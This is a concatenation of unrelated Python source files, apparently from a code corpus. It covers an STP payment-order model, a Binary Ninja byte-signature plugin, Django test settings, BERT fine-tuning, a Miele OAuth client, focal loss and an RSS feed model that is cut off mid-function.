medio_entrega = IntField()
prioridad = IntField()
compound_key = StringField()
detalle = StringField()
events = ListField(ReferenceField(Event))
meta = {
'indexes': [
'+stp_id',
'+speid_id',
'+clave_rastreo',
# The Unique-Sparse index skips over any document that is missing
# the indexed field (null values)
{'fields': ['+compound_key'], 'unique': True, 'sparse': True},
]
}
def set_state(self, state: Estado):
callback_helper.set_status_transaction(self.speid_id, state.value)
self.estado = state
self.events.append(Event(type=EventType.completed))
def confirm_callback_transaction(self):
response = ''
self.events.append(Event(type=EventType.created))
self.save()
self.estado = Estado.succeeded
callback_helper.send_transaction(self.to_dict())
self.events.append(
Event(type=EventType.completed, metadata=str(response))
)
def create_order(self) -> Orden:
# Validate account has already been created
if not SKIP_VALIDATION_PRIOR_SEND_ORDER:
try:
account = Account.objects.get(cuenta=self.cuenta_ordenante)
assert account.estado is Estado.succeeded
except (DoesNotExist, AssertionError):
self.estado = Estado.error
self.save()
raise MalformedOrderException(
f'Account has not been registered: {self.cuenta_ordenante}'
f', stp_id: {self.stp_id}'
)
# Don't send if stp_id already exists
if self.stp_id:
return Orden( # type: ignore
id=self.stp_id,
monto=self.monto / 100.0,
conceptoPago=self.concepto_pago,
nombreBeneficiario=self.nombre_beneficiario,
cuentaBeneficiario=self.cuenta_beneficiario,
institucionContraparte=self.institucion_beneficiaria,
cuentaOrdenante=self.cuenta_ordenante,
)
optionals = dict(
institucionOperante=self.institucion_ordenante,
claveRastreo=self.clave_rastreo,
referenciaNumerica=self.referencia_numerica,
rfcCurpBeneficiario=self.rfc_curp_beneficiario,
medioEntrega=self.medio_entrega,
prioridad=self.prioridad,
tipoPago=self.tipo_pago,
topologia=self.topologia,
)
# remove if value is None
remove = []
for k, v in optionals.items():
if v is None:
remove.append(k)
for k in remove:
optionals.pop(k)
try:
order = stpmex_client.ordenes.registra(
monto=self.monto / 100.0,
conceptoPago=self.concepto_pago,
nombreBeneficiario=self.nombre_beneficiario,
cuentaBeneficiario=self.cuenta_beneficiario,
institucionContraparte=self.institucion_beneficiaria,
tipoCuentaBeneficiario=self.tipo_cuenta_beneficiario,
nombreOrdenante=self.nombre_ordenante,
cuentaOrdenante=self.cuenta_ordenante,
rfcCurpOrdenante=self.rfc_curp_ordenante,
**optionals,
)
except (Exception) as e: # Anything can happen here
self.events.append(Event(type=EventType.error, metadata=str(e)))
self.estado = Estado.error
self.save()
raise e
else:
self.clave_rastreo = self.clave_rastreo or order.claveRastreo
self.rfc_curp_beneficiario = (
self.rfc_curp_beneficiario or order.rfcCurpBeneficiario
)
self.referencia_numerica = (
self.referencia_numerica or order.referenciaNumerica
)
self.empresa = self.empresa or STP_EMPRESA
self.stp_id = order.id
self.events.append(
Event(type=EventType.completed, metadata=str(order))
)
self.estado = Estado.submitted
self.save()
return order
|
1620773
|
from binaryninja import *
from multiprocessing import *
def get_address_from_sig(bv, sigList):
br = BinaryReader(bv)
result = 0
length = len(sigList) - 1
for search_func in bv.functions:
br.seek(search_func.start)
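        # Walk the function one instruction at a time, comparing bytes against the
        # signature pattern ('?' entries act as wildcards that match any byte).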
while bv.get_functions_containing(br.offset + length) != None and search_func in bv.get_functions_containing(br.offset + length):
found = True
counter = 0
for entry in sigList:
byte = br.read8()
counter += 1
if entry != byte and entry != '?':
found = False
break
br.offset -= counter
if found:
result = br.offset
break
br.offset += bv.get_instruction_length(br.offset)
if result != 0:
break
return result
def test_address_for_sig(bv, addr, sigList):
br = BinaryReader(bv)
length = len(sigList) - 1
br.seek(addr)
containing = bv.get_functions_containing(br.offset + length)
if containing == None or len(containing) == 0:
return False
found = True
for entry in sigList:
byte = br.read8()
if entry != byte and entry != '?':
found = False
break
return found
def get_amount_of_hits(bv, sigList):
br = BinaryReader(bv)
result = 0
if len(sigList) == 0:
return result
sigLen = len(sigList) - 1
for search_func in bv.functions:
br.seek(search_func.start)
while bv.get_functions_containing(br.offset + sigLen) != None and search_func in bv.get_functions_containing(br.offset + sigLen):
found = True
counter = 0
for entry in sigList:
byte = br.read8()
counter += 1
if entry != byte and entry != '?':
found = False
break
br.offset -= counter
if found:
result += 1
br.offset += bv.get_instruction_length(br.offset)
return result
def get_addr_of_hits(bv, sigList):
br = BinaryReader(bv)
result = []
if len(sigList) == 0:
return result
sigLen = len(sigList) - 1
for search_func in bv.functions:
br.seek(search_func.start)
while bv.get_functions_containing(br.offset + sigLen) != None and search_func in bv.get_functions_containing(br.offset + sigLen):
found = True
counter = 0
for entry in sigList:
byte = br.read8()
counter += 1
if entry != byte and entry != '?':
found = False
break
br.offset -= counter
if found:
result.append(br.offset)
br.offset += bv.get_instruction_length(br.offset)
if bv.get_instruction_length(br.offset) == 0:
break
return result
def SigMakerFind(bv):
f = Finder(bv)
f.start()
class Finder(BackgroundTaskThread):
def __init__(self, bv):
BackgroundTaskThread.__init__(self, "Finding Signature...", True)
self.bv = bv
def run(self):
user_input = get_text_line_input("Find Signature\t\t\t\t\t", "SigMaker")
if user_input == None:
return
sig = user_input.split(" ")
sigList = []
for value in sig:
if value == '?':
sigList.append(value)
elif value != '?' and value != '':
sigList.append(int(value,16))
result = get_address_from_sig(self.bv, sigList)
if result != 0:
new_result = result
            print('Found:\t' + convert_to_hex_string(new_result) + '\nInside:\t' + convert_to_hex_string(self.bv.get_functions_containing(new_result)[0].start) + '\nSignature:\t' + user_input)  # + '\nHits:\t' + convert_to_hex_string(get_amount_of_hits(bv,sigList))
res = show_message_box("Search result",'Address:\t' + convert_to_hex_string(new_result) + '\n' + 'Function:\t' + convert_to_hex_string(self.bv.get_functions_containing(new_result)[0].start) + '\nWant to jump to the address?', MessageBoxButtonSet.YesNoButtonSet, MessageBoxIcon.InformationIcon)
if res == MessageBoxButtonResult.YesButton:
self.bv.file.navigate(self.bv.file.view, new_result)
else:
            print('Found:\t' + 'None' + '\nInside:\t' + 'None' + '\nSignature:\t' + user_input)
show_message_box("Search result",'Address:\t' + 'NONE' + '\n' + 'Function:\t' + 'NONE' + '\n', MessageBoxButtonSet.OKButtonSet, MessageBoxIcon.InformationIcon)
def get_instruction_sig(bv, func, addr):
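    # Return the instruction's raw bytes, masking the bytes that encode referenced
    # constants (pointers or immediates) with '?' wildcards.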
const = func.get_constants_referenced_by(addr)
length = bv.get_instruction_length(addr)
br = BinaryReader(bv)
br.seek(addr)
sig = []
if len(const) == 0:
for x in range(length):
sig.append(br.read8())
elif len(const) > 0:
br.offset += length
new_delta = 0
for cur_const in const:
if cur_const.pointer:
new_delta += 4
else:
br.offset -= new_delta + 1
if const[0].value == br.read8():
new_delta += 1
else:
br.offset -= new_delta + 4
if const[0].value == br.read32():
new_delta += 4
br.offset = addr
for x in range(length - new_delta):
sig.append(br.read8())
for x in range(new_delta):
sig.append('?')
return sig
def get_sig_from_address(bv, addr, first_try = True):
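    # Build a byte signature starting at `addr`, extending it one instruction at a time
    # until it matches a single location; on failure, retry once from the start of the
    # containing function.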
sigList = []
length = len(sigList) - 1
if addr == None:
return sigList
offset = addr
org_func = bv.get_functions_containing(offset)
if len(org_func) == 0:
return sigList
sigList.extend(get_instruction_sig(bv, org_func[0], offset))
if len([x for x in sigList if x != '?']) < 4:
offset += bv.get_instruction_length(offset)
sigList.extend(get_instruction_sig(bv, org_func[0], offset))
hitList = get_addr_of_hits(bv, sigList)
while len(hitList) > 1:
offset += bv.get_instruction_length(offset)
containing = bv.get_functions_containing(offset + 1)
if containing == None or len(containing) == 0 or containing[0] != org_func[0] and first_try:
return get_sig_from_address(bv, org_func[0].start, False)
elif not first_try:
return []
if len(sigList) > 48 and first_try:
return get_sig_from_address(bv, org_func[0].start, False)
elif not first_try:
return []
sigList.extend(get_instruction_sig(bv, org_func[0], offset))
for hit in hitList:
if hit == addr:
continue
if not test_address_for_sig(bv, hit, sigList):
hitList = [x for x in hitList if x != hit]
return sigList
def convert_to_hex_string(value):
str_value = (hex(value).rstrip("L").lstrip("0x").upper() or "0")
if len(str_value) == 1:
return '0' + str_value
else:
return str_value
def convert_to_string(sigList):
if len(sigList) == 0:
return "NONE"
str_sig = ""
count = 0
for entry in sigList:
if entry != '?':
str_sig += convert_to_hex_string(entry)
else:
str_sig += entry
count += 1
if count != len(sigList):
str_sig += ' '
return str_sig
def SigMakerCreate(bv, addr):
show_message_box("Create Signature","It can take a while for the plugin to finish.\nThe search will run in the background but you can cancel it at any time.\nPress 'OK' if you want to start.", MessageBoxButtonSet.OKButtonSet, MessageBoxIcon.InformationIcon)
c = Creator(addr, bv)
c.start()
class Creator(BackgroundTaskThread):
def __init__(self, addr, bv):
BackgroundTaskThread.__init__(self, "Creating Signature...", True)
self.addr = addr
self.bv = bv
def run(self):
sigList = get_sig_from_address(self.bv, self.addr)
str_sig = convert_to_string(sigList)
        print('Created Signature:\t' + str_sig)
show_message_box("Created Signature",'Address:\t' + convert_to_hex_string(get_address_from_sig(self.bv, sigList)) + '\n' + 'Signature:\t' + str_sig + '\n', MessageBoxButtonSet.OKButtonSet, MessageBoxIcon.InformationIcon)
PluginCommand.register("[SigMaker] Find Signature", "", SigMakerFind)
PluginCommand.register_for_address("[SigMaker] Create Signature", "", SigMakerCreate)
|
1620830
|
import os
DATABASES = {
"default": {
"ENGINE": "django.db.backends.%s" % os.getenv("DB_BACKEND", "sqlite3"),
"NAME": os.getenv("DB_NAME", ":memory:"),
"USER": os.getenv("DB_USER"),
"PASSWORD": os.getenv("DB_PASSWORD"),
"HOST": os.getenv("DB_HOST", ""),
"PORT": os.getenv("DB_PORT", ""),
"TEST": {
"USER": "default_test",
},
},
}
DEFAULT_AUTO_FIELD = "django.db.models.AutoField"
if os.environ.get("DB_BACKEND") in {"mysql", "mariadb"}:
DATABASES["default"]["OPTIONS"] = {
"init_command": "SET GLOBAL sql_mode=(SELECT REPLACE(@@sql_mode,'ONLY_FULL_GROUP_BY',''));" # noqa
}
INSTALLED_APPS = [
# "django.contrib.auth",
# "django.contrib.admin",
# "django.contrib.contenttypes",
# "django.contrib.sessions",
# "django.contrib.staticfiles",
# "django.contrib.messages",
"testapp",
# "tree_queries",
]
MEDIA_ROOT = "/media/"
STATIC_URL = "/static/"
BASEDIR = os.path.dirname(__file__)
MEDIA_ROOT = os.path.join(BASEDIR, "media/")
STATIC_ROOT = os.path.join(BASEDIR, "static/")
SECRET_KEY = "supersikret"
LOGIN_REDIRECT_URL = "/?login=1"
ROOT_URLCONF = "testapp.urls"
LANGUAGES = (("en", "English"), ("de", "German"))
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
]
},
}
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
|
1620868
|
import os
import argparse
import torch
import torch.nn as nn
from tqdm import tqdm
from transformers import AdamW
from transformers.optimization import WarmupLinearSchedule
from data_loader import *
def calc_accuracy(X,Y):
max_vals, max_indices = torch.max(X, 1)
train_acc = (max_indices == Y).sum().data.cpu().numpy()/max_indices.size()[0]
return train_acc
def train(train_dataloader, dev_dataloader, model, device, optimizer, loss_fn, epoch):
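    # One fine-tuning pass per epoch with gradient clipping and LR scheduling, followed
    # by an evaluation pass over the dev set; the final weights are saved under ./result.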
for e in range(epoch):
train_acc = 0.0
test_acc = 0.0
model.train()
for batch_id, (token_ids, valid_length, segment_ids, label) in enumerate(tqdm(train_dataloader)):
optimizer.zero_grad()
token_ids = token_ids.long().to(device)
segment_ids = segment_ids.long().to(device)
valid_length = valid_length
label = label.long().to(device)
out = model(token_ids, valid_length, segment_ids)
loss = loss_fn(out, label)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
train_acc += calc_accuracy(out, label)
if batch_id % log_interval == 0:
print("epoch {} batch id {} loss {} train acc {}".format(e + 1, batch_id + 1, loss.data.cpu().numpy(),
train_acc / (batch_id + 1)))
print("epoch {} train acc {}".format(e + 1, train_acc / (batch_id + 1)))
        model.eval()  # evaluation phase
for batch_id, (token_ids, valid_length, segment_ids, label) in enumerate(tqdm(dev_dataloader)):
token_ids = token_ids.long().to(device)
segment_ids = segment_ids.long().to(device)
valid_length = valid_length
label = label.long().to(device)
out = model(token_ids, valid_length, segment_ids)
test_acc += calc_accuracy(out, label)
print("epoch {} test acc {}".format(e + 1, test_acc / (batch_id + 1)))
if not os.path.exists("./result"):
os.mkdir("./result")
torch.save(model.state_dict(), 'result/epoch{}_batch{}.pt'.format(epoch, batch_size))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--batch-size", type=int, default=64, help="default=64")
parser.add_argument("--num-epochs", type=int, default=3, help="default=3")
parser.add_argument("--num-workers", type=int, default=5, help="default=5")
parser.add_argument("--num-classes", type=int, default=4, help="default=5")
args = parser.parse_args()
batch_size = args.batch_size
num_epochs = args.num_epochs
num_workers = args.num_workers
'''
batch_size = 24
num_epochs = 3
num_workers = 1
'''
max_len = 64
warmup_ratio = 0.1
max_grad_norm = 1
log_interval = 200
learning_rate = 5e-5
model = BERTClassifier(num_classes=args.num_classes).build_model()
device = torch.device("cuda:0") if torch.cuda.is_available() else torch.device("cpu")
dtls, _ = preprocessing()
train_dataloader, test_dataloader = data_loader(dtls, max_len, batch_size, num_workers)
no_decay = ['bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
'weight_decay': 0.01},
{'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate)
loss_fn = nn.CrossEntropyLoss()
t_total = len(train_dataloader) * num_epochs
warmup_step = int(t_total * warmup_ratio)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=warmup_step, t_total=t_total)
train(train_dataloader, test_dataloader, model, device, optimizer, loss_fn, num_epochs)
|
1620873
|
from flask import Flask, render_template
from Models import *
from CharsApi import BB_Chars_API
app = Flask(__name__)
api = BB_Chars_API()
@app.route('/')
def index():
characters = Characters.select()
return render_template('index.html', api=characters)
if __name__ == '__main__':
app.run(host="0.0.0.0")
myDB.close()
|
1620920
|
import numpy as np
from PIL import Image, ImageDraw, ImageFont, ImageMath
from scipy.stats import norm
def draw_curve(fn, draw,rgba=(250,255,0)):
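    # Approximate the curve with 1000 short line segments, stepping x by eps pixels at a time.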
x = 0
eps=1.0
for _ in range(1000):
pt1 = np.array([x,fn(x)])
pt2 = np.array([x+eps,fn(x+eps)])
x=x+eps
draw.line((pt1[0],pt1[1],pt2[0],pt2[1]),fill=rgba,width=1)
|
1620933
|
import functools
import json
import logging
from datetime import timedelta
from requests.exceptions import ConnectionError
from requests_oauthlib import OAuth2Session
_LOGGER = logging.getLogger(__name__)
class MieleClient(object):
DEVICES_URL = "https://api.mcs3.miele.com/v1/devices"
ACTION_URL = "https://api.mcs3.miele.com/v1/devices/{0}/actions"
def __init__(self, hass, session):
self._session = session
self.hass = hass
async def _get_devices_raw(self, lang):
_LOGGER.debug("Requesting Miele device update")
try:
func = functools.partial(
self._session._session.get,
MieleClient.DEVICES_URL,
params={"language": lang},
)
devices = await self.hass.async_add_executor_job(func)
if devices.status_code == 401:
_LOGGER.info("Request unauthorized - attempting token refresh")
if self._session.refresh_token():
                    return await self._get_devices_raw(lang)
if devices.status_code != 200:
_LOGGER.debug(
"Failed to retrieve devices: {}".format(devices.status_code)
)
return None
return devices.json()
except ConnectionError as err:
_LOGGER.error("Failed to retrieve Miele devices: {0}".format(err))
return None
async def get_devices(self, lang="en"):
home_devices = await self._get_devices_raw(lang)
if home_devices is None:
return None
result = []
for home_device in home_devices:
result.append(home_devices[home_device])
return result
    async def get_device(self, device_id, lang="en"):
        devices = await self._get_devices_raw(lang)
        if devices is None:
            return None
        return devices.get(device_id)
async def action(self, device_id, body):
_LOGGER.debug("Executing device action for {}{}".format(device_id, body))
try:
headers = {"Content-Type": "application/json"}
func = functools.partial(
self._session._session.put,
MieleClient.ACTION_URL.format(device_id),
data=json.dumps(body),
headers=headers,
)
result = await self.hass.async_add_executor_job(func)
if result.status_code == 401:
_LOGGER.info("Request unauthorized - attempting token refresh")
if self._session.refresh_token():
                    return await self.action(device_id, body)
if result.status_code == 200:
return result.json()
elif result.status_code == 204:
return None
else:
_LOGGER.error(
"Failed to execute device action for {}: {} {}".format(
device_id, result.status_code, result.json()
)
)
return None
except ConnectionError as err:
_LOGGER.error("Failed to execute device action: {}".format(err))
return None
class MieleOAuth(object):
"""
Implements Authorization Code Flow for Miele@home implementation.
"""
OAUTH_AUTHORIZE_URL = "https://api.mcs3.miele.com/thirdparty/login"
OAUTH_TOKEN_URL = "https://api.mcs3.miele.com/thirdparty/token"
def __init__(self, client_id, client_secret, redirect_uri, cache_path=None):
self._client_id = client_id
self._client_secret = client_secret
self._cache_path = cache_path
self._token = self._get_cached_token()
self._extra = {
"client_id": self._client_id,
"client_secret": self._client_secret,
}
self._session = OAuth2Session(
self._client_id,
auto_refresh_url=MieleOAuth.OAUTH_TOKEN_URL,
redirect_uri=redirect_uri,
token=self._token,
token_updater=self._save_token,
auto_refresh_kwargs=self._extra,
)
if self.authorized:
self.refresh_token()
@property
def authorized(self):
return self._session.authorized
@property
def authorization_url(self):
return self._session.authorization_url(
MieleOAuth.OAUTH_AUTHORIZE_URL, state="login"
)[0]
def get_access_token(self, client_code):
token = self._session.fetch_token(
MieleOAuth.OAUTH_TOKEN_URL,
code=client_code,
include_client_id=True,
client_secret=self._client_secret,
)
self._save_token(token)
return token
async def refresh_token(self):
body = "client_id={}&client_secret={}&".format(
self._client_id, self._client_secret
)
self._token = await self._session.refresh_token(
MieleOAuth.OAUTH_TOKEN_URL,
body=body,
refresh_token=self._token["refresh_token"],
)
self._save_token(self._token)
def _get_cached_token(self):
token = None
if self._cache_path:
try:
f = open(self._cache_path)
token_info_string = f.read()
f.close()
token = json.loads(token_info_string)
except IOError:
pass
return token
def _save_token(self, token):
_LOGGER.debug("trying to save new token")
if self._cache_path:
try:
f = open(self._cache_path, "w")
f.write(json.dumps(token))
f.close()
except IOError:
                _LOGGER.warning(
                    "Couldn't write token cache to {0}".format(self._cache_path)
                )
self._token = token
|
1620947
|
import torch
from torch.autograd import Variable
import torch.nn.functional as F
def one_hot_embedding(labels, num_classes):
'''
Embedding labels to one-hot form.
Args:
labels: (LongTensor) class labels, sized [N,].
num_classes: (int) number of classes.
Returns:
(tensor) encoded labels, sized [N,#classes].
'''
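    # Row i of the identity matrix is the one-hot vector for class i; index it with the label tensor.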
y = torch.eye(num_classes)
return y[labels]
def focal_loss(x, y):
'''
Focal loss.
Args:
x: (tensor) sized [N,D].
y: (tensor) sized [N,].
Return:
(tensor) focal loss.
'''
alpha = 0.25
gamma = 2
t = one_hot_embedding(y, x.shape[1] + 1)
# exclude background
t = t[:, 1:]
t = Variable(t).cuda()
p = x.sigmoid().float()
# pt = p if t > 0 else 1-p
pt = p * t + (1 - p) * (1 - t)
# w = alpha if t > 0 else 1-alpha
w = alpha * t + (1 - alpha) * (1 - t)
w = w * (1 - pt).pow(gamma)
return F.binary_cross_entropy_with_logits(x.float(), t, w.detach(), size_average=True)
|
1620978
|
import typing
from collections import namedtuple
from django.utils import timezone
from django.db import transaction
from functools import cached_property
from rssant_common.validator import FeedUnionId
from rssant_common.detail import Detail
from rssant_config import MAX_FEED_COUNT
from rssant_feedlib import FeedResponseStatus
from .errors import FeedExistError, FeedStoryOffsetError, FeedNotFoundError
from .feed import (
UserFeed, Feed, FeedStatus, FeedDetailSchema,
FEED_DETAIL_FIELDS, USER_FEED_DETAIL_FIELDS,
)
from .feed_creation import FeedCreation, FeedCreateResult, FeedUrlMap
FeedImportItem = namedtuple('FeedImportItem', 'url, title, group')
class UnionFeed:
def __init__(self, feed, user_feed, detail=False):
self._feed = feed
self._user_feed = user_feed
self._detail = detail
@cached_property
def id(self):
return FeedUnionId(self._user_feed.user_id, self._feed.id)
@property
def user_id(self):
return self._user_feed.user_id
@property
def status(self):
return self._feed.status
@property
def is_ready(self):
return bool(self.status and self.status == FeedStatus.READY)
@property
def url(self):
return self._feed.url
@property
def title(self):
if self._user_feed.title:
return self._user_feed.title
return self._feed.title
@property
def origin_title(self):
return self._feed.title
@property
def group(self):
return self._user_feed.group
@property
def link(self):
return self._feed.link
@property
def author(self):
return self._feed.author
@property
def icon(self):
return self._feed.icon
@property
def version(self):
return self._feed.version
@property
def total_storys(self):
return self._feed.total_storys
@property
def story_offset(self):
return self._user_feed.story_offset
@property
def num_unread_storys(self):
return self._feed.total_storys - self._user_feed.story_offset
@staticmethod
def _union_dt_updated(dt_1, dt_2):
if dt_1 and dt_2:
return max(dt_1, dt_2)
else:
return dt_1 or dt_2
@property
def dt_updated(self):
return self._union_dt_updated(
self._user_feed.dt_updated, self._feed.dt_updated)
@property
def dt_created(self):
if self._user_feed.dt_created:
return self._user_feed.dt_created
return self._feed.dt_created
@property
def dryness(self):
return self._feed.dryness
@property
def freeze_level(self):
return self._feed.freeze_level
@property
def use_proxy(self):
return self._feed.use_proxy
@property
def dt_first_story_published(self):
return self._feed.dt_first_story_published
@property
def dt_latest_story_published(self):
return self._feed.dt_latest_story_published
@property
def description(self):
return self._feed.description
@property
def warnings(self) -> str:
return self._feed.warnings
@property
def encoding(self):
return self._feed.encoding
@property
def etag(self):
return self._feed.etag
@property
def last_modified(self):
return self._feed.last_modified
@property
def response_status(self) -> int:
return self._feed.response_status
@property
def response_status_name(self) -> str:
if self.response_status is None:
return None
return FeedResponseStatus.name_of(self.response_status)
@property
def content_length(self):
return self._feed.content_length
@property
def content_hash_base64(self):
return self._feed.content_hash_base64
@property
def dt_checked(self):
return self._feed.dt_checked
@property
def dt_synced(self):
return self._feed.dt_synced
def to_dict(self):
ret = dict(
id=self.id,
user=dict(id=self.user_id),
is_ready=self.is_ready,
status=self.status,
url=self.url,
total_storys=self.total_storys,
story_offset=self.story_offset,
num_unread_storys=self.num_unread_storys,
dt_updated=self.dt_updated,
dt_created=self.dt_created,
)
detail = Detail.from_schema(self._detail, FeedDetailSchema)
for k in detail.include_fields:
ret[k] = getattr(self, k)
if self._detail:
ret['response_status_name'] = self.response_status_name
return ret
@staticmethod
def get_by_id(feed_unionid, detail=False):
user_id, feed_id = feed_unionid
q = UserFeed.objects.select_related('feed').seal()
q = q.filter(user_id=user_id, feed_id=feed_id)
if not detail:
q = q.defer(*USER_FEED_DETAIL_FIELDS)
try:
user_feed = q.get()
except UserFeed.DoesNotExist as ex:
raise FeedNotFoundError(str(ex)) from ex
return UnionFeed(user_feed.feed, user_feed, detail=detail)
@staticmethod
def bulk_delete(feed_ids):
return Feed.objects.filter(id__in=list(feed_ids)).delete()
@staticmethod
def _merge_user_feeds(user_feeds, detail=False):
def sort_union_feeds(x):
return (bool(x.dt_updated), x.dt_updated, x.id)
union_feeds = []
for user_feed in user_feeds:
union_feeds.append(UnionFeed(user_feed.feed, user_feed, detail=detail))
return list(sorted(union_feeds, key=sort_union_feeds, reverse=True))
@staticmethod
def query_by_user(user_id, hints=None, detail=False):
"""获取用户所有的订阅,支持增量查询
hints: T.list(T.dict(id=T.unionid, dt_updated=T.datetime))
"""
detail = Detail.from_schema(detail, FeedDetailSchema)
exclude_fields = [f'feed__{x}' for x in detail.exclude_fields]
if not hints:
q = UserFeed.objects.select_related('feed').filter(user_id=user_id)
q = q.defer(*exclude_fields)
union_feeds = UnionFeed._merge_user_feeds(list(q.all()), detail=detail)
return len(union_feeds), union_feeds, []
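        # Incremental path: with hints, only fully fetch feeds whose dt_updated is newer than
        # the client's copy, and report ids the client still has that no longer exist.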
hints = {x['id'].feed_id: x['dt_updated'] for x in hints}
q = UserFeed.objects.filter(user_id=user_id).select_related('feed')
q = q.only("id", 'feed_id', 'dt_updated', 'feed__dt_updated')
user_feeds = list(q[:MAX_FEED_COUNT])
total = len(user_feeds)
feed_ids = {user_feed.feed_id for user_feed in user_feeds}
        deleted_ids = []
        for feed_id in set(hints) - feed_ids:
            deleted_ids.append(FeedUnionId(user_id, feed_id))
updates = []
for user_feed in user_feeds:
feed_id = user_feed.feed_id
dt_updated = UnionFeed._union_dt_updated(
user_feed.dt_updated, user_feed.feed.dt_updated)
if feed_id not in hints or not dt_updated:
updates.append(feed_id)
elif dt_updated > hints[feed_id]:
updates.append(feed_id)
q = UserFeed.objects.select_related('feed')\
.filter(user_id=user_id, feed_id__in=updates)
q = q.defer(*exclude_fields)
union_feeds = UnionFeed._merge_user_feeds(list(q.all()), detail=detail)
        return total, union_feeds, deleted_ids
@staticmethod
def delete_by_id(feed_unionid):
user_id, feed_id = feed_unionid
try:
user_feed = UserFeed.objects.only('id').get(user_id=user_id, feed_id=feed_id)
except UserFeed.DoesNotExist as ex:
raise FeedNotFoundError(str(ex)) from ex
user_feed.delete()
@staticmethod
def set_story_offset(feed_unionid, offset):
"""更新故事阅读位置,注意offset只增不减,较小的offset会被忽略"""
union_feed = UnionFeed.get_by_id(feed_unionid)
if not offset:
offset = union_feed.total_storys
if offset > union_feed.total_storys:
raise FeedStoryOffsetError('offset too large')
        # only update if the new offset is ahead of what has already been read
        if offset > union_feed.story_offset:
            user_feed = union_feed._user_feed
user_feed.story_offset = offset
user_feed.dt_updated = timezone.now()
user_feed.save()
return union_feed
@classmethod
def set_title(cls, feed_unionid, title):
return cls._set_fields(feed_unionid, title=title)
@classmethod
def set_group(cls, feed_unionid, group):
return cls._set_fields(feed_unionid, group=group)
@staticmethod
def _set_fields(feed_unionid, **fields):
union_feed = UnionFeed.get_by_id(feed_unionid)
user_feed = union_feed._user_feed
for key, value in fields.items():
setattr(user_feed, key, value)
user_feed.dt_updated = timezone.now()
user_feed.save()
return union_feed
@staticmethod
def set_all_group(user_id: int, feed_ids: list, *, group: str) -> int:
q = UserFeed.objects.filter(user_id=user_id).filter(feed_id__in=feed_ids)
return q.update(
group=group,
dt_updated=timezone.now(),
)
@staticmethod
def set_all_readed_by_user(user_id, ids=None) -> int:
if ids is not None and not ids:
return 0
        q = UserFeed.objects.select_related('feed').filter(user_id=user_id)
        if ids is not None:
            feed_ids = [x.feed_id for x in ids]
            q = q.filter(feed_id__in=feed_ids)
q = q.only('_version', 'id', 'story_offset', 'feed_id', 'feed__total_storys')
updates = []
now = timezone.now()
for user_feed in q.all():
num_unread = user_feed.feed.total_storys - user_feed.story_offset
if num_unread > 0:
user_feed.story_offset = user_feed.feed.total_storys
user_feed.dt_updated = now
updates.append(user_feed)
with transaction.atomic():
for user_feed in updates:
user_feed.save()
return len(updates)
@staticmethod
def delete_all(user_id, ids=None) -> int:
if ids is not None and not ids:
return 0
q = UserFeed.objects.select_related('feed').filter(user_id=user_id)
if ids is not None:
feed_ids = [x.feed_id for x in ids]
q = q.filter(feed_id__in=feed_ids)
q = q.only('_version', 'id')
num_deleted, details = q.delete()
return num_deleted
@staticmethod
def create_by_url(*, user_id, url):
feed = None
target = FeedUrlMap.find_target(url)
if target and target != FeedUrlMap.NOT_FOUND:
feed = Feed.objects.filter(url=target).first()
if feed:
user_feed = UserFeed.objects.filter(user_id=user_id, feed=feed).first()
if user_feed:
raise FeedExistError('already exists')
user_feed = UserFeed(user_id=user_id, feed=feed)
feed.unfreeze()
user_feed.save()
return UnionFeed(feed, user_feed), None
else:
feed_creation = FeedCreation(user_id=user_id, url=url)
feed_creation.save()
return None, feed_creation
@staticmethod
def create_by_imports(
*,
user_id: int,
imports: typing.List[FeedImportItem],
batch_size: int = 500,
is_from_bookmark: bool = False,
) -> FeedCreateResult:
        # Pre-fetch everything in bulk to keep the number of SQL queries low; this significantly improves performance
if not imports:
return FeedCreateResult.empty()
import_map = {x.url: x for x in imports}
urls = set(import_map.keys())
url_map = {}
for url, target in FeedUrlMap.find_all_target(urls).items():
if target == FeedUrlMap.NOT_FOUND:
urls.discard(url)
else:
url_map[url] = target
# url not existed in url_map: url_map outdated or new url
for url in (urls - set(url_map.keys())):
url_map[url] = url
rev_url_map = {v: k for k, v in url_map.items()}
found_feeds = list(
Feed.objects.seal()
.filter(url__in=set(url_map.values()))
.defer(*FEED_DETAIL_FIELDS).all()
)
feed_id_map = {x.id: x for x in found_feeds}
feed_map = {x.url: x for x in found_feeds}
q = UserFeed.objects.filter(user_id=user_id, feed__in=found_feeds).all()
user_feed_map = {x.feed_id: x for x in q.all()}
for x in user_feed_map.values():
x.feed = feed_id_map[x.feed_id]
        # Several URLs can map to the same feed; only one UserFeed may be kept per feed, so deduplicate by feed_id
new_user_feed_ids = set()
new_user_feeds = []
feed_creations = []
unfreeze_feed_ids = set()
for url in urls:
feed = feed_map.get(url_map.get(url))
if feed:
if feed.id in user_feed_map:
continue
new_user_feed_ids.add(feed.id)
if feed.freeze_level and feed.freeze_level > 1:
unfreeze_feed_ids.add(feed.id)
else:
import_item = import_map.get(url)
feed_creation = FeedCreation(
user_id=user_id, url=url,
title=import_item.title if import_item else None,
group=import_item.group if import_item else None,
is_from_bookmark=is_from_bookmark,
)
feed_creations.append(feed_creation)
new_user_feeds = []
for feed_id in new_user_feed_ids:
feed = feed_id_map[feed_id]
import_item = import_map.get(rev_url_map.get(feed.url))
# only set UserFeed.title when import title not equal feed title
title = None
if import_item and import_item.title and import_item.title != feed.title:
title = import_item.title
user_feed = UserFeed(
user_id=user_id, feed=feed,
title=title,
